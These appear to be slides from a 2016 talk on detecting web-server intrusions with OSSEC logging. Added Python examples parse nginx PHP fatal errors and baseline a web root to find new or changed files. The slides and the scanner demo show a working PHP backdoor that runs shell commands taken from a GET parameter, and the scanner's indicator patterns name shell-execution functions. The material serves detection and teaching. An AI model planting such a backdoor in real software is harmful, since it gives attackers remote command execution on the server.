Intrusion detected through logging
CoreSec 2016-05-19
Jonas Lejon
triop.se
kryptera.se
jonas@triop.se
@jonasl
OSSEC HIDS Notification.
2013 Jun 16 23:48:29
Received From: hetzner->/var/www/logs/error.log
Rule: 31421 fired (level 5) -> "PHP internal error (missing file or function)."
Portion of the log(s):
2013/06/16 23:48:27 [error] 2252#0: *9980497 FastCGI sent in stderr: "PHP message: PHP Fatal error: Call to undefined function includ_once() in /var/www/docs/wp-content/themes/mytheme/footer.php on line 1" while reading upstream, client: 5.9.164.69, server: hetzner, request: "GET /wp-content/themes/mytheme/images/favicon.ico HTTP/1.1", upstream: "fastcgi://unix:/tmp/php5-fpm.sock:", host: "hetzner"
+
output {
  if [type] == "syslog" {
    file {
      message_format => "%{[message]}"
      path => "/ebs/syslog/logstash/%{[host]}.syslog"
    }
  }
}
find /ebs/syslog/logstash/ -type f -exec ./util.sh addfile {} syslog \;
• IP address
• Metadata
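The notification on the earlier slide is the whole point of the talk: a typo in code that was edited on disk (includ_once instead of include_once) turned a silent change to the theme's footer.php into a PHP fatal error, and OSSEC rule 31421 surfaced it. The script below is an added example, not the talk's own code or OSSEC's, and it does what the two bullets ask for: it parses nginx/php-fpm error-log lines of the shape shown in the notification and raises an alert with the client IP address and the request metadata for every "Call to undefined function" fatal error. The log lines are constructed samples in that format; the client IPs are documentation-range placeholders, and the regular expressions are assumptions about the nginx error-log layout rather than anything the slides state.

```python
import re
import sys

# Constructed sample lines in the nginx/php-fpm error-log format seen in the
# OSSEC notification on the slide. Client IPs are documentation-range placeholders.
SAMPLE_ERROR_LOG = """\
2013/06/16 23:48:27 [error] 2252#0: *9980497 FastCGI sent in stderr: "PHP message: PHP Fatal error:  Call to undefined function includ_once() in /var/www/docs/wp-content/themes/mytheme/footer.php on line 1" while reading upstream, client: 192.0.2.10, server: hetzner, request: "GET /wp-content/themes/mytheme/images/favicon.ico HTTP/1.1", upstream: "fastcgi://unix:/tmp/php5-fpm.sock:", host: "hetzner"
2013/06/16 23:50:01 [error] 2252#0: *9980512 FastCGI sent in stderr: "PHP message: PHP Warning:  file_get_contents(): failed to open stream in /var/www/docs/wp-content/plugins/demo/demo.php on line 42" while reading upstream, client: 198.51.100.7, server: hetzner, request: "GET /?p=1 HTTP/1.1", upstream: "fastcgi://unix:/tmp/php5-fpm.sock:", host: "hetzner"
2013/06/16 23:51:13 [error] 2252#0: *9980530 open() "/var/www/docs/robots.txt" failed (2: No such file or directory), client: 203.0.113.5, server: hetzner, request: "GET /robots.txt HTTP/1.1", host: "hetzner"
"""

# nginx error-log prefix: timestamp, level, pid#tid, *connection, then the message
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) \[(?P<level>\w+)\] "
    r"(?P<pid>\d+)#\d+: \*(?P<conn>\d+) (?P<msg>.*)$"
)
# The PHP fatal error that php-fpm relays through FastCGI stderr
FATAL_RE = re.compile(
    r"PHP Fatal error:\s+Call to undefined function (?P<func>\w+)\(\) "
    r"in (?P<file>\S+) on line (?P<line>\d+)"
)
# Request metadata nginx appends to the record: client, server, request, host
FIELD_RE = re.compile(
    r', (?P<key>client|server|request|host): "?(?P<val>[^"]+?)"?(?=, |$)'
)


def parse_line(line):
    """Parse one error-log line into its prefix fields plus nginx metadata,
    or return None for a line that is not in nginx error-log format."""
    m = LINE_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    rec.update({k: v for k, v in FIELD_RE.findall(rec["msg"])})
    return rec


def detect_php_fatal(lines):
    """Return one alert dict per 'Call to undefined function' fatal error.

    A fatal error pointing into a theme or plugin file is the signal from the
    slide: code on disk was edited and no longer runs. Each alert carries the
    client IP and the request so the responder can pivot into the access log.
    """
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        f = FATAL_RE.search(rec["msg"])
        if f is None:
            continue
        alerts.append({
            "ts": rec["ts"],
            "function": f["func"],
            "file": f["file"],
            "line": int(f["line"]),
            "in_wp_content": "/wp-content/" in f["file"],
            "client": rec.get("client"),
            "request": rec.get("request"),
            "host": rec.get("host"),
        })
    return alerts


if __name__ == "__main__":
    # Pass an error-log path as the first argument; otherwise use the samples.
    source = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_ERROR_LOG.splitlines()
    for a in detect_php_fatal(source):
        print(f"{a['ts']} client={a['client']} {a['function']}() in "
              f"{a['file']}:{a['line']} request={a['request']!r}")
```

Run it over the path from the notification, /var/www/logs/error.log, and the alert's client field is the IP address the bullets refer to, while file and line point at the theme or plugin file to diff against a known-good copy. The in_wp_content flag is there because an undefined-function error in a core file usually means a broken upgrade, whereas one in a theme or plugin file that nobody deployed deserves the higher priority.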
https://gist.github.com/jonaslejon
<?php
if (substr(md5($_GET["localdate"]),0,6) == "6fbcb8") {
$time = str_replace("@"," ",$_GET["localtime"]);
@system($time); exit;
}
?>
Example of a backdoor
File integrity
OSSEC HIDS Notification.
2015 Jul 16 00:41:30
Received From: ds5090->syscheck
Rule: 554 fired (level 7) -> "File added to the /var/www directory."
Portion of the log(s):
New file '/var/www/website.com/docs/president.php' added to the file system.
--END OF NOTIFICATION
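The backdoor slide and the syscheck notification above describe one defence from two sides: a baseline of what the web root should contain, and a look at what any new or changed PHP file actually does. The script below is an added example, not the talk's own code or OSSEC's. It builds a sha256 baseline of a directory, diffs a later snapshot against it the way syscheck rule 554 reports a new file under /var/www, and content-scans every added or modified .php file for the three traits the slide's backdoor shows: a shell-execution function call, request superglobals as its input, and a comparison against a truncated md5. The web root it runs against is a temporary directory constructed inside the script, with the slide's backdoor as the planted file; the indicator names and the directory layout are the example's own assumptions.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Indicator patterns drawn from the backdoor on the slide. Each alone occurs in
# legitimate code; all three together in a file nobody deployed do not.
INDICATORS = [
    ("shell-exec-call",
     re.compile(r"@?\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I)),
    ("request-superglobal", re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")),
    ("truncated-md5-compare", re.compile(r"substr\s*\(\s*md5\s*\(", re.I)),
]

# The backdoor from the slide, used here only as the planted sample file.
BACKDOOR_SAMPLE = """<?php
if (substr(md5($_GET["localdate"]),0,6) == "6fbcb8") {
$time = str_replace("@"," ",$_GET["localtime"]);
@system($time); exit;
}
?>
"""


def sha256_file(path):
    """Hex sha256 of a file, read in chunks so large uploads do not hurt."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map POSIX-style relative path -> sha256 for every regular file under root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in root.rglob("*") if p.is_file()}


def compare(old, new):
    """Classify paths as added, removed or modified between two baselines."""
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    modified = sorted(k for k in set(old) & set(new) if old[k] != new[k])
    return {"added": added, "removed": removed, "modified": modified}


def scan_php(source):
    """Return the names of the indicator patterns present in PHP source text."""
    return [name for name, rx in INDICATORS if rx.search(source)]


def check_webroot(root, old_baseline):
    """Diff root against old_baseline (what syscheck rule 554 reports), then
    content-scan every added or modified .php file. Returns (changes, findings)."""
    changes = compare(old_baseline, build_baseline(root))
    findings = {}
    for rel in changes["added"] + changes["modified"]:
        if rel.endswith(".php"):
            hits = scan_php(Path(root, rel).read_text(errors="replace"))
            if hits:
                findings[rel] = hits
    return changes, findings


def demo():
    """Constructed scenario: a clean web root at deploy time, then a planted file."""
    with tempfile.TemporaryDirectory() as root:
        docs = Path(root, "docs")
        docs.mkdir()
        (docs / "index.php").write_text("<?php echo 'hello'; ?>\n")
        (docs / "footer.php").write_text("<?php include_once 'parts.php'; ?>\n")
        baseline = build_baseline(root)                      # taken at deploy time
        (docs / "president.php").write_text(BACKDOOR_SAMPLE)  # the intrusion
        return check_webroot(root, baseline)


if __name__ == "__main__":
    changes, findings = demo()
    print("changes:", changes)
    print("findings:", findings)
```

In production the baseline is stored off the web server (an attacker who can write president.php can also rewrite a baseline kept next to it) and refreshed only by the deployment pipeline, so that every entry in added or modified is by definition something the pipeline did not do. The content scan is a triage aid, not a verdict: a hit tells the responder which of the changed files to read first.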
Thanks!

Detecting intrusions using logging